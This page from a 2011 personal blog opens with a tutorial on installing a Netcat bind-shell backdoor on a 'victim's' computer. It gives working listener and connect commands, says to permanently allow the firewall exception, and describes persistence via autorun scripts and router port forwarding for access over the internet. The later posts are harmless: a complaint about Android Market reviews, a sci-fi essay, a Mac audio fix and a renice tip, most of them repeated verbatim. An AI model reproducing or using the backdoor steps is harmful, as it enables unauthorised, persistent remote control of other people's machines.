Want to be an elite hacker, but don't know where to begin?? MyPrivateVoid() takes you back to basics with our Old School Hacking series of Tutorials.
For our first tutorial, we will show you how to install a simple backdoor on nearly any system using Netcat's dead-simple shell binding functionality.
Background:
What is a backdoor?
A backdoor is "a method of bypassing normal authentication, securing remote access to a computer"
What tools will we be using?
Netcat - a computer networking service for reading from and writing network connections using TCP or UDP. Netcat is the "Swiss Army Knife of TCP/IP" (Wikipedia Description)
Netcat is preinstalled on almost all Unix/BSD variants (Mac OSX and Linux) and is available for Windows.
Prerequisites:
You must have command line access to the computer on which you wish to install the backdoor.
If you wish to be able to access the backdoor from someplace other than the local network (across the internet) then you need access to the victim's router configurations.
And now, without further ado, LET'S HACK THE GIBSON!
The Procedure:
If the intended victim's computer is running Windows, start at Step 1, otherwise, skip to Step 2
Step 1) Download Netcat for Windows and extract it to a location on the victim's computer that is in the system path. (I use C:\Windows\)
Step 2) On the victim computer, from the command line, type:
nc -L -p PORT -d -e PATH_TO_SHELL
PORT can be any port number that is not already assigned to another service, try something in the 10000-99999 range
PATH_TO_SHELL is the location of the shell executable that will be bound to the port.
In Windows, this would simply be: cmd.exe
In Linux or Mac, this might be something like: /bin/bash (can be found by typing: which bash)
Usage Example:
nc -L -p 49127 -d -e cmd.exe
This command causes Netcat to run in the background, as it own process.. so you can close the terminal window and it will continue to run!
Netcat is now listening for any incoming connection on port 49127 and binding it to the specified executable, which in this case, is the Windows "shell"
Windows computers will often throw up a window asking if you would like to allow the Windows Firewall to let traffic from nc.exe through... Make sure to permanently allow traffic on all networks, public and private.
Step 3) On your computer (which should have Netcat installed and be on the same network as the victim) type into your terminal:
nc -v -n IP_ADDRESS PORT
IP_ADDRESS is the local IP address of the victim's computer... duh!
PORT is the port you specified in Step 2
Usage Example:
nc -v -n 192.168.1.100 49127
Voila! If you did everything correctly, you should now have remote shell access to the victim's computer!!!
(You will have the same access permissions as whatever user happens to be logged on at the time)
Extending this Tutorial
Make this backdoor persist a system shutdown or reboot: Append the command you ran in Step 2 to the autorun script of the particular OS you are working with. (Google is your friend!)
Make the remote shell accessible from any computer (not just those on the LAN): Access the victim's router and add a port forwarding rule which forwards the port you selected in Step 2 to the IP Address of the victim's computer. Once this is done, you will be able to access the remote shell from anywhere by just replacing their LAN IP Address with their external IP Address in the Netcat command.
*Interesting Side Note: Android has Netcat built into it... Mobile Hacking FTW!
Have fun!
__________________________________________
Tuesday, June 28, 2011
Friday, June 17, 2011
An Open Letter to Everyone that Comments on The Android Market
Dear Android Market Commenter,
As an aspiring developer, I deeply value your feedback!
H O W E V E R...
It would be great if you could please stop doing the following things:
1) Stating that you have withheld "Stars" until a specific feature is implemented.
Why you should stop: It makes developers MAD! It gives the impression that you think your review (probably one of hundreds) is so important, that it is equivalent to your holding the dev's next of kin hostage until your demands are met.
What you should do instead: If you would like to see the app improve... Send the Dev a politely worded email.
2) Writing "UNINSTALLED" at the end of your negative review.
Why you should stop: Because DUH!!! Of course you uninstalled the app if you didn't like it... What does this add to the review? Are you trying to hurt my feelings? Because, you haven't.
What you should do instead: If you would like to see the app improve... Send the Dev a politely worded email.
3) Asking the developer a question in your review.
Why you should stop: THEY CAN'T ANSWER YOU!!!! Google provides no method for contacting the authors of Market comments.
What you should do instead: If you would like to see the app improved... Send the Dev a politely worded email.
4) General rudeness.
Why you should stop: Just because you can't see me doesn't mean that I don't exist... I am an actual person. If you didn't like the drink you got at Starbucks (which was probably more expensive than my app) would you be so rude? Probably not... you know why? Because in real life, you could get your face slapped off or a generous helping of saliva in your cafe americano.
What you should do instead: I think you can probably guess.
Thanks for your time!
Sincerely,
Every Android Developer on Earth
_________________________________________________
As an aspiring developer, I deeply value your feedback!
H O W E V E R...
It would be great if you could please stop doing the following things:
1) Stating that you have withheld "Stars" until a specific feature is implemented.
Why you should stop: It makes developers MAD! It gives the impression that you think your review (probably one of hundreds) is so important, that it is equivalent to your holding the dev's next of kin hostage until your demands are met.
What you should do instead: If you would like to see the app improve... Send the Dev a politely worded email.
2) Writing "UNINSTALLED" at the end of your negative review.
Why you should stop: Because DUH!!! Of course you uninstalled the app if you didn't like it... What does this add to the review? Are you trying to hurt my feelings? Because, you haven't.
What you should do instead: If you would like to see the app improve... Send the Dev a politely worded email.
3) Asking the developer a question in your review.
Why you should stop: THEY CAN'T ANSWER YOU!!!! Google provides no method for contacting the authors of Market comments.
What you should do instead: If you would like to see the app improved... Send the Dev a politely worded email.
4) General rudeness.
Why you should stop: Just because you can't see me doesn't mean that I don't exist... I am an actual person. If you didn't like the drink you got at Starbucks (which was probably more expensive than my app) would you be so rude? Probably not... you know why? Because in real life, you could get your face slapped off or a generous helping of saliva in your cafe americano.
What you should do instead: I think you can probably guess.
Thanks for your time!
Sincerely,
Every Android Developer on Earth
_________________________________________________
Wednesday, June 15, 2011
Why Does Sci-Fi Hate Nerds?
Generally speaking, nerds LOVE science-fiction in all its many forms... however, as several notable examples bear out, it appears that this relationship is not entirely reciprocal.
Lately I have noticed a trend in several science-fiction movies and television series where the characters who carry out the "nerd-work" (scientists, technology specialists, IT professionals etc...) are being portrayed as spineless, socially inept, second-class members of their respective teams... despite the fact that they often play the most crucial role in solving whatever problem confronts them.
I will use three Sci-Fi shows to demonstrate this... Star Trek: The Next Generation, Stargate: Atlantis and Sanctuary.
The Sci-Fi Cast
A Strong, Often Stoic Leader - Jean Luc Picard (TNG) Elizabeth Weir (SGA) Helen Magnus (SANC)
A Heroic Man of Action - Will Riker (TNG) John Sheppard (SGA) Will Zimmerman (SANC)
The Nerd - Geordi LaForge (TNG) Rodney McKay (SGA) Henry Foss (SANC)
The Sci-Fi Formula
On a "routine mission", an unforeseen problem arises... The Leader dispatches the Hero to solve the problem... the Hero does something heroic, but usually ineffectual and becomes imperiled... the Leader demands that the Nerd accomplishes something that should be impossible to rectify the situation, usually in a loud, rude manner... The Nerd is disparaged by the Leader and/or The Hero for being too whiny and/or weak... The Nerd accomplishes the impossible task, effectively saving the day... The Hero performs some showy, yet ultimately trivial final task (like pushing a button)... The Hero receives the vast majority of the credit for the victory and gets the girl... The Nerd goes back to his computer and utter lack of friends... The End!
Note: Picard rarely ever disparaged LaForge, but he did ask the impossible of him constantly, and it was always Riker that got all the alien ladies.. so you get the point.
My Question: Why Sci-Fi? Why do you bite the hand that feeds you?
Lately I have noticed a trend in several science-fiction movies and television series where the characters who carry out the "nerd-work" (scientists, technology specialists, IT professionals etc...) are being portrayed as spineless, socially inept, second-class members of their respective teams... despite the fact that they often play the most crucial role in solving whatever problem confronts them.
I will use three Sci-Fi shows to demonstrate this... Star Trek: The Next Generation, Stargate: Atlantis and Sanctuary.
The Sci-Fi Cast
A Strong, Often Stoic Leader - Jean Luc Picard (TNG) Elizabeth Weir (SGA) Helen Magnus (SANC)
A Heroic Man of Action - Will Riker (TNG) John Sheppard (SGA) Will Zimmerman (SANC)
The Nerd - Geordi LaForge (TNG) Rodney McKay (SGA) Henry Foss (SANC)
The Sci-Fi Formula
On a "routine mission", an unforeseen problem arises... The Leader dispatches the Hero to solve the problem... the Hero does something heroic, but usually ineffectual and becomes imperiled... the Leader demands that the Nerd accomplishes something that should be impossible to rectify the situation, usually in a loud, rude manner... The Nerd is disparaged by the Leader and/or The Hero for being too whiny and/or weak... The Nerd accomplishes the impossible task, effectively saving the day... The Hero performs some showy, yet ultimately trivial final task (like pushing a button)... The Hero receives the vast majority of the credit for the victory and gets the girl... The Nerd goes back to his computer and utter lack of friends... The End!
Note: Picard rarely ever disparaged LaForge, but he did ask the impossible of him constantly, and it was always Riker that got all the alien ladies.. so you get the point.
My Question: Why Sci-Fi? Why do you bite the hand that feeds you?
Tuesday, June 14, 2011
A Very Simple Work-Around for the Mac OS X "Popping" Audio Problem
As I continue to play with my "new" iBook G4, I have run across several fairly minor, yet infuriatingly obnoxious issues... one of which is the extremely common "popping" audio issue that seems to effect a variety of Mac's. Surprisingly, in my search, I was unable to find a suitable fix on any of the Apple forums. Some sites recommended reverting the audio kernel extension to an older version, however, I am always remiss to downgrade my system, so I began looking for a alternative solution to this issue... here is what I found:
Firstly, to be specific, my issue is only apparent when listening to music and does not occur when audio is not playing (as some have experienced). My music sounds crackly and poppy through a pair of mid-range headphones. This issue is apparent in iTunes, Vox and VLC and is seen in all my music files, regardless of audio quality.
The Work-Around: In VLC, Open the Equalizer window and select the "Headphones" preset, Enable the "Two-Pass" option and the Enable the EQ settings. You may need to adjust the Preamp settings to suit your headphones. This setting should eliminate any poppy, crackly audio you were experiencing.
Note: Strangely, in Vox (my previously default music player), similar EQ modification were ineffective in solving this issue. I didn't even try it in iTunes, as iTunes SUCKS!
Another Note: If the audio sounds too tinny, you may be able to get away with turning off the Two-Pass option, for richer sound, while still eliminating the crackle.
Firstly, to be specific, my issue is only apparent when listening to music and does not occur when audio is not playing (as some have experienced). My music sounds crackly and poppy through a pair of mid-range headphones. This issue is apparent in iTunes, Vox and VLC and is seen in all my music files, regardless of audio quality.
The Work-Around: In VLC, Open the Equalizer window and select the "Headphones" preset, Enable the "Two-Pass" option and the Enable the EQ settings. You may need to adjust the Preamp settings to suit your headphones. This setting should eliminate any poppy, crackly audio you were experiencing.
Note: Strangely, in Vox (my previously default music player), similar EQ modification were ineffective in solving this issue. I didn't even try it in iTunes, as iTunes SUCKS!
Another Note: If the audio sounds too tinny, you may be able to get away with turning off the Two-Pass option, for richer sound, while still eliminating the crackle.
A Tip for Improving System Performance on Older Mac/Linux Machines
If you have an older, resource-deprived machine running Mac OSX or any Linux variant, here is a useful tip to improve system "load-balancing" and stability.
Firstly, determine what you want to accomplish... for the sake of this example, let's say that your music player becomes choppy while performing certain CPU intensive tasks.
Step 1) Open a Terminal window and type "top"
(This will display a task manager that shows all running processes and their associated resource-usage)
Step 2) Find the process that you are interested in changing, in our case, iTunes and take note of the number next to that process in the PID column, this is the process ID for that particular application. In our case the PID is 187, but this will be different on every computer and every time a process is restarted, it will be assigned a new PID.
Step 3) Hit Ctrl+Z to stop TOP and bring you back to your terminal prompt.
Step 4) Use the "renice" command to alter the CPU scheduler priority of that process.
The renice command takes an integer value between -19 (highest priority) and 19 (lowest priority). We call this value, the "niceness".
The niceness that we set for a particular process is specific to our goals. In our example, choppy iTunes, we might want to set the niceness to -10
Note: The niceness of a process can be set to positive number integer values (lower priority) without the need for elevated privileges, however, to set niceness to a negative integer (higher priority), you will need to provide the superuser password.
So, the appropriate command for our specific example would be:
sudo renice -10 -p 187
Explanation of the command:
sudo - Runs the command as SuperUser, so it will ask for the root password once you hit enter. This part of the command is not necessary if you are setting niceness to a positive value.
renice - The command to change CPU scheduler priority
-10 - The niceness we chose to set this process to.
-p - The command switch that tells renice that we will be giving it the process ID.
187 - The process ID that we got from TOP.
This very simple, very old command line utility has a near infinite number of uses, so.. Have Fun!
If you think this is cool and would like to very easily wield this level of control over your Android powered device, check out my app, Mr. Nice Guy on the Android Market:
Mr. Nice Guy
Firstly, determine what you want to accomplish... for the sake of this example, let's say that your music player becomes choppy while performing certain CPU intensive tasks.
Step 1) Open a Terminal window and type "top"
(This will display a task manager that shows all running processes and their associated resource-usage)
Step 2) Find the process that you are interested in changing, in our case, iTunes and take note of the number next to that process in the PID column, this is the process ID for that particular application. In our case the PID is 187, but this will be different on every computer and every time a process is restarted, it will be assigned a new PID.
Step 3) Hit Ctrl+Z to stop TOP and bring you back to your terminal prompt.
Step 4) Use the "renice" command to alter the CPU scheduler priority of that process.
The renice command takes an integer value between -19 (highest priority) and 19 (lowest priority). We call this value, the "niceness".
The niceness that we set for a particular process is specific to our goals. In our example, choppy iTunes, we might want to set the niceness to -10
Note: The niceness of a process can be set to positive number integer values (lower priority) without the need for elevated privileges, however, to set niceness to a negative integer (higher priority), you will need to provide the superuser password.
So, the appropriate command for our specific example would be:
sudo renice -10 -p 187
Explanation of the command:
sudo - Runs the command as SuperUser, so it will ask for the root password once you hit enter. This part of the command is not necessary if you are setting niceness to a positive value.
renice - The command to change CPU scheduler priority
-10 - The niceness we chose to set this process to.
-p - The command switch that tells renice that we will be giving it the process ID.
187 - The process ID that we got from TOP.
This very simple, very old command line utility has a near infinite number of uses, so.. Have Fun!
If you think this is cool and would like to very easily wield this level of control over your Android powered device, check out my app, Mr. Nice Guy on the Android Market:
Mr. Nice Guy
Subscribe to:
Posts (Atom)